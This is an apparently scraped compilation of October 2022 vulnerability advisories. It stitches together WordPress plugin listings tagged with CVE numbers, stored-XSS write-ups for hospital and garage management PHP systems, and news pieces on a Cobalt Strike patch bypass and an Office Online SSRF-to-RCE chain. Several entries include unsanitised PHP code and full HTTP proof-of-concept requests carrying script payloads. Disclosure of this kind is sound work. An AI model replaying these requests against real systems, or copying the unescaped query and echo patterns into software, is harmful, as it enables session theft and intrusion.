Threat Roundup for October 14 to October 21

Auth. Stored Cross-Site Scripting (XSS) in Pop-Up Chop Chop plugin <= 2.1.7 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**OVERVIEW**

Pop-Up Chop Chop plugin brings unlimited pop-ups with easily customizable professional templates. Each template comes in **two sizes** (big and small). The pop-ups are **fully responsive** and work with any WordPress theme.

With Pop-Up Chop Chop 2.0 you can create **any number** of input fields and collect your visitors’ emails, names, phone numbers…

Pop-Up Chop Chop is a perfect solution to capture the audience’s attention in the right time and place to build your mailing list.

**CUSTOMIZATION**

Pop-Up Chop Chop allows you to build elegant and professional pop-ups in a couple of minutes. Create attractive content and the pop-ups matching your website’s design. Preview your changes live while editing the content in our custom visual editor. Decide when the visitors see your pop-up – set the time and display the pop-up exactly when and where you want to.

**Features:**

*   Unlimited pop-up number
*   Multiple input fields (drag & drop ordering)
*   Neat designs
*   6 elegant and professional pop-up templates
*   Two pop-up sizes (big and small)
*   Responsive pop-up themes
*   Retina-friendly
*   Quick and easy pop-up setup
*   User-friendly interface
*   Smooth and swift admin panel
*   Highly customizable content
*   Email notifications
*   Turn on/off the pop-ups on mobile devices

**Using The WordPress Dashboard**

1.  Navigate to the ‘Add New’ in the plugins dashboard
2.  Search for ‘pop-up’
3.  Click ‘Install Now’
4.  Activate the plugin on the Plugin dashboard
5.  Go to PopUp in the left menu to manage the pop-ups

**Uploading in WordPress Dashboard**

1.  Navigate to the ‘Add New’ in the plugins dashboard
2.  Navigate to the ‘Upload’ area
3.  Select pop-up from your computer
4.  Click ‘Install Now’
5.  Activate the plugin in the Plugin dashboard
6.  Go to PopUp in the left menu to manage the pop-ups

**Using FTP**

1.  Download ‘pop-up’
2.  Extract the ‘pop-up’ directory to your computer
3.  Upload the ‘pop-up’ directory to the ‘/wp-content/plugins/’ directory
4.  Activate the plugin in the Plugin dashboard
5.  Go to PopUp in the left menu to manage the pop-ups

**1\. How do I add custom fields to my pop-up?**

Follow the Custom Fields Manual to learn how to add new fields to your contact form.

**2\. Questions? Comments?**

Contact talk@chop-chop.org if you have any questions or wish to provide feedback.

Possibilité de relier à MailChimp en version Pro. Vraiment très simple à utiliser et paramétrer.

I went thru all free pop-up plugins out there and everyone of them was really bad - hard to configure, not responsive or just ugly. Pop-up CC is easy to setup and looks awesome. Premium version has more options, but free is still very good - you can use all the templates etc. I had and issue tho with plugin not sending notifications about new subscribers so wrote about it to the creators and they responded very fast, helping me fix it. It works as intended now. Thanks!

Great plugin design and functionality. I had some difficulty setting it up - based on a lack of developer knowledge, but their support team were fantastic and responded to my query within hours. They went above ad beyond to get me set up and now I'm on my way there's no looking back. Can't recommend highly enough - keep up the great work.

Good and quite simple to use. Poor documentation, you have to try to understand some option.

Read all 16 reviews

“Pop-Up Chop Chop” is open source software. The following people have contributed to this plugin.

Contributors

*    Chop Chop

**2.1.7**

WordPress 5.5.1 and PHP 7.4 compatibility  
FIX: Minor php and css errors

**2.1.6**

WordPress 5.4.2 compatibility  
FIX: Input error message

**2.1.5**

WordPress 5.4.1 compatibility  
PHP 7.4 compatibility

**2.1.3**

FIX: Admin responsive css  
UPDATE: Tested with 4.9.2

**2.0.9**

Change load time

**2.0.8**

Cleanup

**2.0.6**

ADD: close on overlay click

**2.0.5**

ADD: style select to wysywig editor

**2.0.4**

Delete: old live preview fields

**2.0.3**

ADD: missing files in wordpress repo

**2.0.2**

ADD: missing files in wordpress repo

**2.0.1**

UPDATE: add newsletter metabox file

**1.4.1**

FIX: wordpress help tabs

**1.4.0**

ADD: CMB upgrade

**1.3.5**

FIX: “disable on” list

**1.3.4**

FIX: Templates css

**1.3.3**

ADD: woocommerce products to “disable on” list

**1.3.2**

FIX: background image uploader

**1.3.0**

ADD: woocommerce pages to “disable on” list

**1.2.5**

FIX: Customize button

**1.2.4**

FIX: Templates css

**1.2.3**

FIX: Google fonts

**1.2.2**

ADD: Jquery Cookies new version

**1.2.1**

FIX: Templates css

**1.2.0**

FIX: Templates css

**1.1.6**

FIX: Templates css

**1.1.5**

ADD: Close timeout option  
FIX: Templates css

**1.1.4**

FIX: Templates css  
FIX: Wysiwyg editor

**1.1.3**

ADD: Field label

**1.1.2**

ADD: “Thank you” message edit option

**1.1.1**

ADD: intro/outro fade  
ADD: New thumbnails  
FIX: Newsletter section

**1.1.0**

FIX: Admin ajax  
ADD: Speed optimization

**1.0.9**

FIX: Templates css

**1.0.8**

ADD: Cookie option  
FIX: Templates css  
ADD: Admin panel enhancements

**1.0.7**

FIX: Templates css

**1.0.6**

FIX: Wysiwyg editor

**1.0.5**

ADD: Field label  
FIX: Button css

**1.0.4**

FIX: headers  
FIX: mobile templates

**1.0.3**

FIX: Templates css

**1.0.2**

FIX: Templates css  
ADD: “Show once per session” option  
ADD: Auto close the pop-up after the sign-up

**1.0.1**

Fix: newsletter signup form

**1.0.0**

First release

CVE-2022-41638: Pop-Up Chop Chop

Auth. (admin+) Stored Cross-Site Scripting (XSS) in Fatcat Apps Analytics Cat plugin <= 1.0.9 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Analytics Cat – Google Analytics is a lean, fast, simple, no-frills way to add your Google Analytics / Universal Google Analytics code to your WordPress site.

This bloat-free, simple Google Analytics WordPress plugin doesn’t add tons of features. Instead, Analytics Cat – Google Analytics simply focuses on letting you add your Google Analytics (Universal Analytics) Code to your site in less than 2 minutes, without slowing your site down.

**Which features does Analytics Cat – Google Analytics have?**

*   Add the Google Analytics (Universal Analytics) tracking code to your WordPress site with ease.
*   Hide your Google Analytics tracking code from logged-in users so you don’t pollute your data.

**How to use Analytics Cat – Google Analytics?**

There are multiple ways to add the Google Analytics tracking code to your WordPress site.

**1\. Pasting your Google Analytics script into your theme**  
This approach isn’t great for two reasons:  
a) If you edit your live site and make a mistake when pasting your Google Analytics script into your theme, you could take down your website.  
b) If your theme is updated with new features or security fixes, your Google Analytics code will be overwritten.

**2\. Pasting your Google Analytics script into a header/footer script plugin**  
This is a valid approach, but has some disadvantages. General purposes “header script plugins” aren’t built from the ground-up to support Google Analytics.

What this means is that :  
a) These plugins lack Google Analytics-specific functionality.  
b) These plugins will not adapt if Google Analytics changes again. Since Analytics Cat is a dedicated Google Analytics WordPress plugin, we’ll make sure make sure to stay compatible with future changes to Google Analytics.  
c) These plugins usually don’t support hiding your Google Analytics code from logged-in users.

**3\. Using Some Other Google Analytics WordPress Plugin**  
There are some good Google Analytics plugins out there, but many of them are bloated, have too many settings and are slow.

You’ll love Analytics Cat – Google Analytics Cat iff what you want is a simple, reliable Google Analytics plugin,

**Does Analytics Cat – Google Analytics Plugin work with Universal Analytics?**

Yes. Analytics Cat is built from the ground up to support Universal Analytics.

Analytics Cat – Google Analytics does not work with the old Google Analytics script that Google deprecated.

**Can I hide my Google Analytics tracking code from logged in users?**

Yes. You can hide your Google Analytics code from logged in users by going to Settings -> Google Analytics Manager.

**Is Analytics Cat – Google Analytics easy to translate?**

Yes. Analytics Cat – Google Analytics Cat is fully translateable. Please let us know if you’re interested in contributing.

**Analytics Cat – Google Analytics Feature Roadmap**

This is just the first version of Analytics Cat – we have tons of new features & improvements lined up. Do you have any suggestions? Please leave a comment in the support forums.

—The Fatcat Apps Team

**Privacy Disclosure**

This plugin can be configured to connect to 3rd party service providers such as Google.

If you use this plugin to connect to a 3rd party, personal data may also be shared with that party.

Additional privacy policy information for 3rd party services can be found here:

Google

Our full privacy policy is available here: https://fatcatapps.com/legal/privacy-policy/

*   Analytics Cat - Google Analytics for WordPress settings screen
    

1.  Upload the Analytics Cat – Google Analytics plugin file (fca-ga.zip) to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  In your sidebar, select ‘Settings -> Google Analytics Manager’ to add your tracking code.

**How do I set up Google Analytics using Analytics Cat?**

After installing this plugin, simply go to Settings -> Google Analytics Manager and add your Google Analytics (Universal Analytics) ID.

**What is my Google Analytics tracking ID?**

Follow these steps to find your Google Analytics tracking id:

1.  Sign in to your Google Analytics account
    
2.  On the bottom left side of the screen, click on “Admin” (Cog icon).
    
3.  Select your preferred Account and Property from the columns.
    
4.  Under Property, Click ‘Tracking Info’ > ‘Tracking Code’
    
5.  You will find your Tracking ID here (example: UA-xxxxxx-01)
    
6.  Paste this Tracking ID into Analytics Cat
    

Important: Do not paste your tracking code (starting with ). Instead, paste your tracking id (example: UA-xxxxxx-01) into Analytics Cat.

**Can I anonimize ip addresses?**

Yes you can! Append the following code to your theme’s functions.php page:

    function my_custom_ga_attributes ( $value ) {
        return '&aip=1';
    }
    
    add_filter( 'fca_ga_attributes', 'my_custom_ga_attributes' );
    

For more information, read this: How to find your Google Analytics tracking code, Google Analytics tracking ID, and Google Analytics property number

This plugin works well and does what it's supposed to do without issues.

Does what it says. Simple and easy to setup.

No extra fluff makes me tear up in joy. Thank you for staying true to the description and point. 👏

I have used this plugin to get input/insights for my ActiveCampaign marketing tool. It does exactly what it says it does, reliably.

It works really well but I deducted a star because I have started getting spam after installing it. Prior to this I was receiving none and this is the only plugin I have installed in the last three months.

Read all 11 reviews

“Analytics Cat – Google Analytics Made Easy” is open source software. The following people have contributed to this plugin.

Contributors

**Analytics Cat – Google Analytics 1.1.1**

*   Improved notices
*   Changed default role exclusion to none
*   Fix potential empty value error reported
*   Remove unused API calls

**Analytics Cat – Google Analytics 1.1.0**

*   Improved security for Editor page
*   Tested up to WordPress 5.9.1

**Analytics Cat – Google Analytics 1.0.9**

*   Updated feedback form
*   Tested up to WordPress 5.6.2

**Analytics Cat – Google Analytics 1.0.8**

*   Fixed double tracking issue

**Analytics Cat – Google Analytics 1.0.7**

*   Tested up to WordPress 5.5

**Analytics Cat – Google Analytics 1.0.6**

*   Added filter fca\_ga\_attributes to add ability to customize enqueued script attributes (see readme)
*   Admin UI text update
*   Removed quotes from Google Analytics ID ( fixed issue with 3rd party add-on )
*   Tested up to WordPress 5.4.2

**Analytics Cat – Google Analytics 1.0.5**

*   Upgraded from analytics.js to gtag.js
*   Tested up to WordPress 5.4.1

**Analytics Cat – Google Analytics 1.0.4**

*   Load Select2 library locally instead of via CDN
*   Add privacy disclosure

**Analytics Cat – Google Analytics 1.0.3**

*   Removed installation splash screen

**Analytics Cat – Google Analytics 1.0.2**

*   Add settings saved message
*   Update help text & links
*   Update permissions text

**Analytics Cat – Google Analytics 1.0.1**

*   Fix link to quick start guide in admin UI

**Analytics Cat – Google Analytics 1.0.0**

*   Release candidate 1 of Analytics Cat – Google Analytics

CVE-2022-40311: Analytics Cat – Google Analytics Made Easy

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via add-patient.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

In the **add-patient.php** file, several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

      /\* ... \*/

if(isset($\_POST\['submit'\]))
{
    $docid=$\_SESSION\['id'\];
    $patname=$\_POST\['patname'\];
    $patcontact=$\_POST\['patcontact'\];
    $patemail=$\_POST\['patemail'\];
    $gender=$\_POST\['gender'\];
    $pataddress=$\_POST\['pataddress'\];
    $patage=$\_POST\['patage'\];
    $medhis=$\_POST\['medhis'\];
    $sql=mysqli\_query($con,"insert into tblpatient(Docid,PatientName,PatientContno,PatientEmail,PatientGender,PatientAdd,PatientAge,PatientMedhis)
values('$docid','$patname','$patcontact','$patemail','$gender','$pataddress','$patage','$medhis')");

      /\* ... \*/

In the **admin/manage-patients.php**, **doctor/manage-patient.php**, **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      /\* Example from doctor/view-patient.php\*/

$vid=$\_GET\['viewid'\];
$ret=mysqli\_query($con,"select \* from tblpatient where ID='$vid'");
$cnt=1;
while ($row=mysqli\_fetch\_array($ret)) {

    /\* ... \*/
    echo $row\['PatientName'\];
    /\* ... \*/
    echo $row\['PatientEmail'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientContno'\];
    /\* ... \*/
    echo $row\['PatientAdd'\];
    /\* ... \*/
    echo $row\['PatientGender'\];
    /\* ... \*/
    echo $row\['PatientMedhis'\];
    /\* ... \*/
    echo $row\['CreationDate'\];
    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **patname**, **patemail**, **gender**, **pataddress** and **medhis** POST parameters.  
The following is one of the possible exploitation using the **medhis POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php HTTP/1.1
Host: localhost
Content-Length: 180
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/add-patient.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

patname=Name4&patcontact=3124432845&patemail=Name3%40mail.com&gender=male&pataddress=3021+Halsted+St%2C+Chicago&patage=40&medhis=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42205: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #2 | Systems and Internet Security Lab

PHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patient.php, and view-medhistory.php.

**Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3**

**Cross site scripting in Hospital Management System Gurukul v4.0 Heading link**

Multiple **stored cross site scripting vulnerabilities** are present in Hospital Management System Gurukul v4.0

The files **doctor/view-patient.php**, **admin/view-patient.php** and **view-medhistory.php** share a common piece of code where several **POST** **parameters** are directly used into the INSERT SQL query without any kind of escaping or sanitization.

    /\* ... \*/

if(isset($\_POST\['submit'\]))
{

    $vid=$\_GET\['viewid'\];
    $bp=$\_POST\['bp'\];
    $bs=$\_POST\['bs'\];
    $weight=$\_POST\['weight'\];
    $temp=$\_POST\['temp'\];
    $pres=$\_POST\['pres'\];

    $query.=mysqli\_query($con,"insert tblmedicalhistory(PatientID,BloodPressure,BloodSugar,Weight,Temperature,MedicalPres) 
value('$vid','$bp','$bs','$weight','$temp','$pres')");

    
    /\* ... \*/

In the same files, the data that was inserted by the above-mentioned query is retrieved from the database and added to the current page.

      
    /\* ...\*/

while ($row=mysqli\_fetch\_array($ret)) { 

    echo $cnt;
    echo $row\['BloodPressure'\];
    echo $row\['Weight'\];
    echo $row\['BloodSugar'\];
    echo $row\['Temperature'\];
    echo $row\['MedicalPres'\];
    echo $row\['CreationDate'\];

    /\* ... \*/

The vulnerable parameters through which the attack can be carried out are **bp**, **bs**, **weight**, **temp** and **pres** POST parameters.  
The following is one of the possible exploitation using the **pres POST parameter**.

POST /hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3 HTTP/1.1
Host: localhost
Content-Length: 94
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/hospitalmanagementsystemproject4/hospital/hms/doctor/view-patient.php?viewid=3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=lrqh66ialqjgfot5rcq90bnvjj
Connection: close

bp=120%2F85&bs=12&weight=70kg&temp=36&pres=\[url-encoded-script\]&submit=

An attacker can easily inject malicious Javascript into the database and steal session cookies from users and administrators.

These vulnerabilities were found using the NAVEX project developed at SISL lab in UIC.

CVE-2022-42206: Stored Cross Site Scripting Vulnerabilities in Hospital Management System Gurukul v4.0 #3 | Systems and Internet Security Lab

The fix was developed at a running pace as Cobalt Strike is essential to Red Team operations

The fix was developed at a running pace as Cobalt Strike is essential to Red Team operations

  

The team behind the Cobalt Strike penetration testing tool has responded to reports of a failed remote code execution (RCE) exploit patch with a new fix.

HelpSystems’ Cobalt Strike enables cybersecurity professionals to simulate attacks with post-exploit agents and is arguably the most popular threat emulation software of its type.

However, the source code of old versions of the licensed software is subject to leaks – the latest of which reportedly took place in 2020.

As a result, Cobalt Strike often surfaces within the arsenal of sophisticated threat actors who use the software to set up command and control (C2) beacons for illicit communication.

**Failed fix**

Given the importance of this tool and how red teams worldwide rely on Cobalt Strike for their research and cybersecurity audits, the details of the failed patch were kept private until a fix could be released.

On October 17, Rio Sherri, managing security consultant of IBM’s X-Force Red Adversary Simulation team, revealed in a blog post that a patch designed to resolve a known RCE vulnerability had failed.

The vulnerability, tracked as CVE-2022-39197 and issued a CVSS severity score of 6.1, is a cross-site scripting (XSS) issue that allowed remote attackers to execute code without permission on the Cobalt Strike teamserver.

It was possible to trigger the bug by inspecting a Cobalt Strike v.4.7 payload and modifying the username field. Alternatively, an intruder could create a new, malicious payload using the extracted information.

A researcher with the pseudonym ‘Beichendream’ privately reported the original security flaw.

HelpSystems published an out-of-band patch for the RCE on September 20. The Cobalt Strike 4.7.1 release added a new property to the teamserver file, which “specifies whether XSS validation is performed on selected Beacon metadata,” according to HelpSystems.

However, after IBM researchers Sherri and Ruben Boonen examined the patch, it transpired that the 4.7.1 update was “insufficient to mitigate the impact of the vulnerability”.

If an attacker created Java Swing components, the researchers found, it was possible to circumvent the fix and create arbitrary Java objects in class paths, as Java Swing will interpret any text as HTML content as long as it begins with an HTML tag. Object tags could then load a malicious payload from the server, which a Cobalt Strike client would subsequently deploy.

**Second patch**

IBM X-Force notified HelpSystems of its findings privately and requested a new CVE, CVE-2022-42948. The researchers also assisted Cobalt Strike developers in creating a bulletproof patch.

The vulnerability has been resolved in Cobalt Strike v. 4.7.2 via a second out-of-band patch. HelpSystems thanked IBM, noting that the circumvention was caused by the Cobalt Strike interface being built on the Java Swing framework.

While IBM requested a new CVE, HelpSystems did not, noting that the underlying issue is in Java Swing rather than Cobalt Strike as a standalone application.

“We felt that there were parallels between this and the recent log4j vulnerability – thousands of applications that used log4j were vulnerable and yet there aren’t CVEs to cover every single vulnerable application,” commented Greg Darwin, Cobalt Strike software development manager. “It is the same case here, although I appreciate that some people may disagree.”

The Daily Swig has reached out to IBM for clarity on the focus of the new CVE assignment and we will update if and when we hear back.

DON’T MISS Apache Commons Text RCE: Resemblance to Log4Shell but exposure risk is ‘much lower’

Failed Cobalt Strike fix with buried RCE exploit now patched

Behavior functioning as intended, Microsoft reportedly says, and offers mitigation advice instead

Ben Dickson 20 October 2022 at 15:46 UTC

Behavior functioning as intended, Microsoft reportedly says, and offers mitigation advice instead

Windows servers running Microsoft Office Online Server can be exploited to achieve server-side request forgery (SSRF) and thereafter remote code execution (RCE) on the host, according to security researchers.

Researchers from MDSec said they informed the Microsoft Security Response Center of their findings, but were told that the vulnerable behavior is not a bug but a feature of Office Online Server, and therefore will not be fixed.

Read more of the latest Microsoft security news

According to MDSec, Microsoft has instead advised administrators to “lock down ports and any accounts on that farm to have least privilege” to avoid attacks against internet-connected Office Online hosts.

Administrators can also set the service’s flag to false to prevent access to files through UNC paths, which is the feature used to attack the server.

**SSRF**

Office Online Server is an ASP.NET service that provides browser-based versions of Word, Excel, PowerPoint, and OneNote. Office Online provides access to Office files through SharePoint, Exchange Server, shared folders, and websites.

Office Online has a .aspx page for retrieving documents from remote resources. Attackers can use this endpoint to initiate connections to remote resources through the server and perform SSRF, according to a technical write-up from security firm MDSec.

For example, the researchers found that they could send unauthenticated requests to the page to fingerprint the devices of the server’s local network. Based on the timing of the response, they could identify active IP addresses in the server’s network.

**RCE**

Attackers could further exploit the bug if they controlled an SMB server that the Office Online Server could access.

Office Online Server uses its machine account to initiate connections to remote resources. When using the endpoint to retrieve a document on their SMB server, researchers could use the tool ntlmrelayx to force the server to relay the connection to the Active Directory Certificate Services (ACDS) and retrieve a client certificate for the Active Directory network.

Using this certificate, they were able to obtain a Ticket-Granting Ticket (TGT) – a logon session token – to the Office Online Server host. They used the TGT to send an S4U2Self request to forge a service ticket to the server. This allowed them to obtain local administrator access to the host.

According to the researchers’ findings, there was another pathway to obtain remote access to the server by relaying the endpoint connection to the LDAP service and performing a shadow credential attack.

The Daily Swig reached out to Microsoft for comments. We will update this post if we hear back.

YOU MIGHT ALSO LIKE Adobe patches critical Magento XSS that puts sites at takeover risk

Microsoft Office Online Server open to SSRF-to-RCE exploit

Cross Site Scripting (XSS) vulnerability in New equipment page in EasyVista Service Manager 2018.1.181.1 allows remote attackers to run arbitrary code via the notes field.

CVE-2021-33231

A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.

**Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS****Exploit Author: Sam Wallace****Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Version: 1.0****Tested on: Debian****ID: CVE-2022-41358****Summary:**

Garage Management System utilizes client side validation to prevent XSS. Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.

**When messages suggest that validation is occuring this is a good point in time to validate that these checks are also being completed server side.**

**This is the request prior to any modifications in Burp.**

**Perform a quick modification in Burp...**

**Profit!**

**Proof**

**POC**

    Parameter: categoriesName
    URI: /garage/php_action/createCategories.php
    

    Host: 10.24.0.69
    Content-Length: 367
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.24.0.69
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.24.0.69/garage/add-category.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
    Connection: close
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesName"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesStatus"
    
    1
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS--
    
    
    ![Alt text](/img/Intercept.png "Optional title")
    

**Reference:**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

CVE-2022-41358: GitHub - thecasual/CVE-2022-41358

phpMyFAQ versions 3.1.7 and prior are vulnerable to stored cross-site scripting (XSS). A patch is available on the `main` branch of the repository and anticipated to be part of version 3.2.0-alpha.

**phpMyFAQ vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Oct 19, 2022 • Updated Oct 19, 2022

Tag

#xss